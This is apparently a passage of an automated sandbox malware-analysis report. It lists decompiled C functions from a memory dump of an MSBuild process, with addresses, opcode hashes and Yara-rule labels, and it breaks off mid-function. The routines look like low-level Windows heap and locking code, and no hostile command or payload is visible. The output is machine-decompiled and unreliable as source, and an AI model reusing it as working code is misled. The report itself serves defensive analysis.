                                                                                                0x010e9110
                                                                                                0x010e9118
                                                                                                0x010e9147
                                                                                                0x010e9148
                                                                                                0x010e914f
                                                                                                0x010e9150
                                                                                                0x010e9151
                                                                                                0x010e9152
                                                                                                0x010e9156
                                                                                                0x010e915d
                                                                                                0x010e9160
                                                                                                0x010e9168
                                                                                                0x010e916c
                                                                                                0x010e91bc
                                                                                                0x010e91be
                                                                                                0x00000000
                                                                                                0x010e91be
                                                                                                0x010e916e
                                                                                                0x010e9173
                                                                                                0x010e9176
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010e917c
                                                                                                0x010e9180
                                                                                                0x010e91b5
                                                                                                0x00000000
                                                                                                0x010e91b5
                                                                                                0x010e9182
                                                                                                0x010e9185
                                                                                                0x010e9189
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010e918e
                                                                                                0x010e9190
                                                                                                0x010e9198
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010e91a0
                                                                                                0x00000000
                                                                                                0x010e91ad
                                                                                                0x010e91ad
                                                                                                0x010e91b0
                                                                                                0x010e91b1
                                                                                                0x00000000
                                                                                                0x010e9185
                                                                                                0x010e911a
                                                                                                0x010e911c
                                                                                                0x010e911f
                                                                                                0x010e9125
                                                                                                0x010e9127
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                • Instruction ID: aaf2d79743dc34840e1bf89f577d28f277c72bb866c882fdcf036782d22e974d
                                                                                                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                • Instruction Fuzzy Hash: 16219571A00315EFDB21DF59C448E9AFBF8EB54754F1584AEE989A7200D330ED10CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D3B7A Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 59%
                                                                                                			E010D3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x11984c4; // 0x0
				_v12 = 1;
				_v8 =  *0x11984c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x11984c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E010EAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E010EFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x11984c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x11984c4; // 0x0
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                                                0x010d3b89
                                                                                                0x010d3b96
                                                                                                0x010d3ba1
                                                                                                0x010d3bab
                                                                                                0x010d3bb5
                                                                                                0x010d3bb9
                                                                                                0x01116298
                                                                                                0x010d3bbf
                                                                                                0x010d3bc2
                                                                                                0x010d3bc3
                                                                                                0x010d3bc9
                                                                                                0x010d3bca
                                                                                                0x010d3bcc
                                                                                                0x010d3bcd
                                                                                                0x010d3bd4
                                                                                                0x010d3bd6
                                                                                                0x010d3bdb
                                                                                                0x010d3bea
                                                                                                0x010d3bf7
                                                                                                0x010d3bfb
                                                                                                0x010d3bff
                                                                                                0x010d3c09
                                                                                                0x010d3c0a
                                                                                                0x010d3c0b
                                                                                                0x010d3c0f
                                                                                                0x010d3c14
                                                                                                0x010d3c18
                                                                                                0x010d3c18
                                                                                                0x010d3bfb
                                                                                                0x010d3c1b
                                                                                                0x010d3c30
                                                                                                0x010d3c30
                                                                                                0x010d3c3d

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e79f80baf141045e6ca27d13572ee04f15cf5dabc5910524e57812819d103775
                                                                                                • Instruction ID: 60fbe660561babb54506b15af526a24af334fb594ce501f5dd9e0002e3233be1
                                                                                                • Opcode Fuzzy Hash: e79f80baf141045e6ca27d13572ee04f15cf5dabc5910524e57812819d103775
                                                                                                • Instruction Fuzzy Hash: 71218EB2A00209EFC714DF98CD81B9ABBBDFF44648F190068EA08EB251D371AD41CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01126CF0 Relevance: .1, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 80%
                                                                                                			E01126CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E010C7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E010C7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1085c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E010DF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E010DF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01127016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L010C2400( &_v52);
								}
								_t21 = L010C2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                                                0x01126cfb
                                                                                                0x01126d00
                                                                                                0x01126d02
                                                                                                0x01126d06
                                                                                                0x01126d0a
                                                                                                0x01126d0e
                                                                                                0x01126d19
                                                                                                0x01126d2b
                                                                                                0x01126d1b
                                                                                                0x01126d24
                                                                                                0x01126d24
                                                                                                0x01126d33
                                                                                                0x01126d39
                                                                                                0x01126d46
                                                                                                0x01126d4f
                                                                                                0x01126d61
                                                                                                0x01126d51
                                                                                                0x01126d5a
                                                                                                0x01126d5a
                                                                                                0x01126d69
                                                                                                0x01126d6b
                                                                                                0x01126d6d
                                                                                                0x01126d6f
                                                                                                0x01126d6f
                                                                                                0x01126d74
                                                                                                0x01126d79
                                                                                                0x01126d7a
                                                                                                0x01126d7f
                                                                                                0x01126d82
                                                                                                0x01126d88
                                                                                                0x01126d89
                                                                                                0x01126d90
                                                                                                0x01126d94
                                                                                                0x01126da7
                                                                                                0x01126db1
                                                                                                0x01126db1
                                                                                                0x01126dbb
                                                                                                0x01126dbb
                                                                                                0x01126d90
                                                                                                0x01126d69
                                                                                                0x01126d46
                                                                                                0x01126dc6

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d6f99608731a356e316ca7252e798065e65acfcf15c970bbd1b4bd76d88c6f58
                                                                                                • Instruction ID: e35710fcf21d97752e4312d610b0c15dd9748efb5f0efc288554efc2f600e8a4
                                                                                                • Opcode Fuzzy Hash: d6f99608731a356e316ca7252e798065e65acfcf15c970bbd1b4bd76d88c6f58
                                                                                                • Instruction Fuzzy Hash: F021C17250429D9BD315EF28C944BAFBBECAF91640F04055AFEC087291EB34D959CAA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0117070D Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 67%
                                                                                                			E0117070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E011707DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0116AFDE( &_v8,  &_v12);
					E01171293(_t38, _v28, _t60);
					if(E010C7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E011614FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                                                0x0117071b
                                                                                                0x01170724
                                                                                                0x01170734
                                                                                                0x01170738
                                                                                                0x0117074b
                                                                                                0x0117074b
                                                                                                0x01170753
                                                                                                0x01170753
                                                                                                0x01170759
                                                                                                0x0117075d
                                                                                                0x01170774
                                                                                                0x01170779
                                                                                                0x0117077d
                                                                                                0x01170789
                                                                                                0x01170795
                                                                                                0x011707a7
                                                                                                0x01170797
                                                                                                0x011707a0
                                                                                                0x011707a0
                                                                                                0x011707af
                                                                                                0x011707c4
                                                                                                0x011707cd
                                                                                                0x011707cd
                                                                                                0x011707af
                                                                                                0x011707dc

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                • Instruction ID: edda4a0e8bc239651501cd1089b45d70ba08230d802accc625cc5a1d2c4eb7b4
                                                                                                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                • Instruction Fuzzy Hash: D5213436204700AFD709DF1CC880B6ABBB5EFD5350F048569F9959B381C730D949CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01127794 Relevance: .1, Instructions: 70COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E01127794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1197b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E010EF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E010C7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E010E9AE0();
					_t24 = L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                                                0x01127799
                                                                                                0x0112779a
                                                                                                0x0112779b
                                                                                                0x011277a3
                                                                                                0x011277ab
                                                                                                0x011277ae
                                                                                                0x011277b1
                                                                                                0x011277b1
                                                                                                0x011277bf
                                                                                                0x011277c4
                                                                                                0x011277c8
                                                                                                0x011277ce
                                                                                                0x011277d4
                                                                                                0x011277e0
                                                                                                0x011277e0
                                                                                                0x011277d6
                                                                                                0x011277d6
                                                                                                0x011277de
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011277de
                                                                                                0x011277e5
                                                                                                0x011277f0
                                                                                                0x011277f3
                                                                                                0x011277f6
                                                                                                0x011277fd
                                                                                                0x01127800
                                                                                                0x0112780c
                                                                                                0x01127818
                                                                                                0x0112782b
                                                                                                0x0112781a
                                                                                                0x01127823
                                                                                                0x01127823
                                                                                                0x01127830
                                                                                                0x01127831
                                                                                                0x01127838
                                                                                                0x0112783d
                                                                                                0x0112783e
                                                                                                0x0112784f
                                                                                                0x0112784f
                                                                                                0x0112785a

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a9c40c4b7a69a50a2e8e9e2adbaad041d6a4717b43efca560a41ecc03c97a2e9
                                                                                                • Instruction ID: f70f0059fc4797853f2299f655f422051d684594516b22021b89b6fb44a2dbec
                                                                                                • Opcode Fuzzy Hash: a9c40c4b7a69a50a2e8e9e2adbaad041d6a4717b43efca560a41ecc03c97a2e9
                                                                                                • Instruction Fuzzy Hash: E921DE72900614AFC729DF69D884EABBBB8EF58740F10056DFA0AC7790D734E900CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010CAE73 Relevance: .1, Instructions: 70COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 96%
                                                                                                			E010CAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E010C7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E010C7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E010C7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E010C7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01127794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                                                0x010cae78
                                                                                                0x010cae7c
                                                                                                0x010cae7e
                                                                                                0x010cae81
                                                                                                0x010cae86
                                                                                                0x010cae8d
                                                                                                0x01112691
                                                                                                0x010cae93
                                                                                                0x010cae93
                                                                                                0x010cae93
                                                                                                0x010cae98
                                                                                                0x010cae9d
                                                                                                0x011126a2
                                                                                                0x011126b4
                                                                                                0x011126a4
                                                                                                0x011126ad
                                                                                                0x011126ad
                                                                                                0x011126b9
                                                                                                0x00000000
                                                                                                0x011126bb
                                                                                                0x00000000
                                                                                                0x011126bb
                                                                                                0x010caea3
                                                                                                0x010caea3
                                                                                                0x010caea3
                                                                                                0x010caeaa
                                                                                                0x011126c0
                                                                                                0x011126c9
                                                                                                0x011126c9
                                                                                                0x010caeb3
                                                                                                0x011126d4
                                                                                                0x011126e1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011126e7
                                                                                                0x011126ee
                                                                                                0x011126f0
                                                                                                0x011126f9
                                                                                                0x011126f9
                                                                                                0x01112702
                                                                                                0x01112708
                                                                                                0x01112708
                                                                                                0x0111270b
                                                                                                0x0111270f
                                                                                                0x01112711
                                                                                                0x01112711
                                                                                                0x01112725
                                                                                                0x01112725
                                                                                                0x00000000
                                                                                                0x010caeb9
                                                                                                0x010caeb9
                                                                                                0x010caebf
                                                                                                0x010caebf
                                                                                                0x010caeb3

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                • Instruction ID: 574fa63205e8a137cbac16d51dc45d09a4335dce8da2d2896e80d4e77f356fba
                                                                                                • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                • Instruction Fuzzy Hash: C921F672701685DFE71A9B6CC944B6ABBE8EF44B40F2904B4DD448B796E734DC40CEA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010DFD9B Relevance: .1, Instructions: 69COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E010DFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E010B76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                                                0x010dfd9b
                                                                                                0x010dfda0
                                                                                                0x010dfda1
                                                                                                0x010dfdab
                                                                                                0x010dfdad
                                                                                                0x010dfdb0
                                                                                                0x010dfdb8
                                                                                                0x010dfe0f
                                                                                                0x010dfde6
                                                                                                0x010dfde9
                                                                                                0x010dfdec
                                                                                                0x0111c0c0
                                                                                                0x010dfdfe
                                                                                                0x010dfe06
                                                                                                0x010dfe06
                                                                                                0x0111c0c8
                                                                                                0x010dfe2d
                                                                                                0x010dfe2d
                                                                                                0x00000000
                                                                                                0x010dfe2d
                                                                                                0x0111c0d1
                                                                                                0x0111c0e0
                                                                                                0x0111c0e5
                                                                                                0x0111c0e5
                                                                                                0x0111c0e8
                                                                                                0x00000000
                                                                                                0x0111c0e8
                                                                                                0x010dfdf4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010dfdf6
                                                                                                0x010dfdfa
                                                                                                0x010dfe1a
                                                                                                0x010dfe1f
                                                                                                0x010dfe1f
                                                                                                0x010dfdfc
                                                                                                0x00000000
                                                                                                0x010dfdfc
                                                                                                0x010dfdcc
                                                                                                0x010dfdd0
                                                                                                0x010dfe26
                                                                                                0x00000000
                                                                                                0x010dfe26
                                                                                                0x010dfdd8
                                                                                                0x010dfddb
                                                                                                0x010dfddd
                                                                                                0x010dfde0
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                • Instruction ID: 31f7c797b6c58c0df24e6ae0e420c20cb62ecf4ef6b1b8d27be8fc323a267c0a
                                                                                                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                • Instruction Fuzzy Hash: 57216A72640742DFD735DF49C540A66F7E5EF94B10F24817EE98687615D7309D02CB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010DB390 Relevance: .1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 54%
                                                                                                			E010DB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E010C2280(_t12, 0x1198608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E010E00C2(0x1198608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                                                0x010db395
                                                                                                0x010db3a2
                                                                                                0x010db3a5
                                                                                                0x010db3aa
                                                                                                0x010db3b2
                                                                                                0x010db3ba
                                                                                                0x010db3bd
                                                                                                0x010db3c0
                                                                                                0x010db3c4
                                                                                                0x010db3c9
                                                                                                0x0111a3e9
                                                                                                0x0111a3ed
                                                                                                0x0111a3f0
                                                                                                0x0111a3ff
                                                                                                0x0111a403
                                                                                                0x0111a409
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0111a40b
                                                                                                0x0111a40b
                                                                                                0x0111a40f
                                                                                                0x0111a415
                                                                                                0x0111a423
                                                                                                0x0111a423
                                                                                                0x0111a415
                                                                                                0x010db3d1
                                                                                                0x010db3e8
                                                                                                0x010db3e8
                                                                                                0x010db3d9

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 013c147d43a2bd2e32d7c592559d1e17c042389a08d184dc17db05913f618c12
                                                                                                • Instruction ID: b327cc8d23eb3ffe49cac5bae5b177d8c92480659b054c2a2d96042c9bd33e4f
                                                                                                • Opcode Fuzzy Hash: 013c147d43a2bd2e32d7c592559d1e17c042389a08d184dc17db05913f618c12
                                                                                                • Instruction Fuzzy Hash: 94114C337162145BCB1D8A199E81A6FB6A6EBC6630B25813DDD56DB380CE315C02C6D0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010A9240 Relevance: .1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 77%
                                                                                                			E010A9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x117f708);
				E010FD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
